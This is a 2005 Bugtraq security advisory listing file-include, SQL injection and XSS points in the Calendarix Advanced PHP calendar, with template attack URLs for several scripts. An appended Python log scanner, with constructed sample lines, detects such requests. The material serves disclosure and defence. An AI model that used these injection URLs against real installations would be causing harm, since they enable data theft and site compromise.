multiple vulnerability Calendarix Advanced
From: DarkBicho (darkbicho_at_gmail.com)
Date: 05/31/05
Date: Tue, 31 May 2005 12:22:16 -0500
To: bugtraq@securityfocus.com
/***********************************************
* Advisory : 01-0005-15
* Title: Multiple vulnerabilities
* Software: Calendarix Advanced
* Date: 28. April 2005
* Web: http://www.calendarix.com/
************************************************/
- Affected software description:
Webcalendar is web software written in PHP and MySQL
- Exploit:
Include
line 16
admin/cal_admintop.php:include_once ($calpath."cal_utils.php");
XSS and SQL injection
line 122 - 160
cal_day.php?op=day&date=2005-05-03&catview=1[sql]/*
cal_pophols.php?id=999'[sql]/*
line 23
calendar.php?op=cal&month=5&year=2'%3Ch1%3DarkBicho005&catview=1
line 194 - 196
cal_week.php?op=week&catview= 999'[sql]/*
line 34 - 39
cal_cat.php?op=cats&catview=999'[sql]*/
- How to fix:
Vendor does not respond
- Credits:
DarkBicho
Email: darkbicho@gmail.com
Web: http://www.swp-scene.org
- Greetings:
"To my Team SWP"
"Long live Peru, damn it"
--
Miguel Sumaran (DarkBicho)
webpage: http://www.darkbicho.tk/
Team : http://www.swp-scene.org/
Made in Peru
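
Added example (not part of the original advisory, and not Calendarix code): since no vendor fix is listed, this Python check scans web-server access logs for requests to the scripts named above whose parameters do not have the expected shape, or that supply calpath. The combined log format, the /calendarix/ install path, the sample lines and the expected value shapes are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Scripts and parameters named in the advisory. The expected value shapes are
# assumptions (numeric ids, ISO dates), not taken from the Calendarix source.
SCRIPTS = {"cal_admintop.php", "cal_day.php", "cal_pophols.php",
           "calendar.php", "cal_week.php", "cal_cat.php"}
INT = re.compile(r"\d{1,6}")
RULES = {"catview": INT, "id": INT, "month": INT, "year": INT,
         "date": re.compile(r"\d{4}-\d{2}-\d{2}"),
         "op": re.compile(r"[a-z]{1,16}")}
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample lines (documentation IPs, hypothetical /calendarix/ path).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jun/2005:10:00:01 -0500] "GET /calendarix/cal_day.php?op=day&date=2005-05-03&catview=1 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Jun/2005:10:00:09 -0500] "GET /calendarix/cal_pophols.php?id=999%27 HTTP/1.1" 200 812',
    '198.51.100.7 - - [01/Jun/2005:10:00:15 -0500] "GET /calendarix/admin/cal_admintop.php?calpath=PLACEHOLDER HTTP/1.1" 200 64',
    '192.0.2.10 - - [01/Jun/2005:10:01:30 -0500] "GET /calendarix/cal_week.php?op=week&catview=3 HTTP/1.1" 200 4410',
]

def check_url(url):
    """Return findings for one request URL; an empty list means it looks clean."""
    parts = urlsplit(url)
    if parts.path.rsplit("/", 1)[-1] not in SCRIPTS:
        return []
    findings = []
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name == "calpath":
            # Assumption: a client never has a legitimate reason to send this.
            findings.append("calpath supplied by client")
        elif name in RULES and not RULES[name].fullmatch(value):
            findings.append(f"{name} has unexpected value {value!r}")
    return findings

def scan(log_lines):
    """Yield (line_number, url, findings) for each suspicious log line."""
    for number, line in enumerate(log_lines, 1):
        match = REQUEST.search(line)
        if match:
            findings = check_url(match.group(1))
            if findings:
                yield number, match.group(1), findings

if __name__ == "__main__":
    for number, url, findings in scan(SAMPLE_LOG):
        print(f"line {number}: {url} -> {'; '.join(findings)}")
```

The same allow-list of parameter shapes can be enforced in front of the application (reverse proxy or WAF rule) until the queries themselves are parameterized.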